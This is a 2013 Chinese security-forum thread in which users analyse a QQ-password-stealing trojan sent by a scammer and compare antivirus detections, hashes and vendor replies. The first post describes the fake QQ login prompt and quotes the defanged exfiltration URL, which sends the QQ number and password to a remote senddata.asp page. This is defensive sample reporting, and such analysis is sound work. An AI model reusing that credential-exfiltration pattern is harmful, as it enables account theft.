骗子给我发的病毒，经测试，是盗q程序。

显示全部楼层 · 发表于 2013-3-2 00:34:37

本帖最后由 mifanu 于 2013-3-6 00:40 编辑

原标题骗子给我发的病毒，谁看看这家伙具体有什么作用？

2013-3-6 今天总算有时间实际测试一下。结果如下。

这家伙伪装成一个qq提示窗口,ps实际上你的qq好像并没有掉线这家伙做的也太不到位了吧.

然后这家伙就启动ie执行一个网址hxxp://192.74.235.251:6565/senddata.asp?1=2595**0601&2=nidongde&3=llc

hxxp://192.74.235.251:6565/senddata.asp?1=qq号&2=密码&3=llc

192.74.235.251 美国。

senddata.asp 应该就是位于这个网站上的一个发送程序，具体发送到哪儿去，就不得而知了。

很明显，这家伙看上了我的qq号

显示全部楼层 · 发表于 2013-3-2 00:36:21

本帖最后由 vm001 于 2013-3-2 00:39 编辑

QQ粘虫
http://fireeye.ijinshan.com/anal ... 2aa73e6591e02472284

显示全部楼层 · 发表于 2013-3-2 01:08:43

1.0.14火绒扫描压缩包或者解压后的文件都是无视！
但双击立即拦截！

显示全部楼层 · 发表于 2013-3-2 01:24:44

过费尔，费尔现在没有针对粘虫类病毒，等防火墙出来了就好了，官人亲自说的

显示全部楼层 · 发表于 2013-3-2 02:06:45

虽然这一类粘虫简陋了一点，外表做的不好，但是这样总算过了卡巴了把？

显示全部楼层 · 发表于 2013-3-2 07:46:57

Flameocean 发表于 2013-3-2 01:24
过费尔，费尔现在没有针对粘虫类病毒，等防火墙出来了就好了，官人亲自说的

防火墙会有键盘记录什么的吗

显示全部楼层 · 发表于 2013-3-2 09:53:40

过诺顿.360扫描
过不了主防

显示全部楼层 · 发表于 2013-3-2 10:07:12

完整路径: c:\users\juechao2000\desktop\对账款单\对账款单.exe
威胁: WS.Reputation.1
____________________________
____________________________

在电脑上的创建时间
不可用

上次使用时间
2013/3/2 星期六 ( 10:06:39 )

启动项目
否

已启动
否

____________________________
____________________________
未知
诺顿社区中使用此文件的用户数量: 未知
____________________________
未知
此文件版本当前未知。
____________________________
中
此文件具有中等程度风险。
____________________________
威胁详细信息
威胁类型: 智能网络威胁。很多迹象表明此文件不可信任，不安全
____________________________

https://att.kafan.cn/forum.php?mo ... DQyODQwNHwxNDc2ODcw

已下载文件对账款单.exe威胁名称: WS.Reputation.1

 自att.kafan.cn

文件来源树



____________________________
文件操作
对账款单.exe
已删除

平均资源使用率:
未知

平均CPU 使用率:
未知

平均内存使用率:
未知

____________________________
文件指纹 - SHA:
0d32244d3b8e7c5c5c2e910ab8bafd2016fb14b45a8485784d82920b09ed47fa
____________________________
文件指纹 - MD5:
2cc5f79880221383972fd9879ee41f6b
____________________________

显示全部楼层 · 发表于 2013-3-2 12:58:32

skilly 发表于 2013-3-2 02:06
虽然这一类粘虫简陋了一点，外表做的不好，但是这样总算过了卡巴了把？

Hello,

####.exe_ - Trojan-Spy.Win32.QQSpy.c

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Config.ini

No malicious code was found in this file.

Regards, Ye Jin
Junior Virus Analyst, Kaspersky Lab.

显示全部楼层 · 发表于 2013-3-2 13:54:48

上报红伞

[病毒样本] 骗子给我发的病毒，经测试，是盗q程序。

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源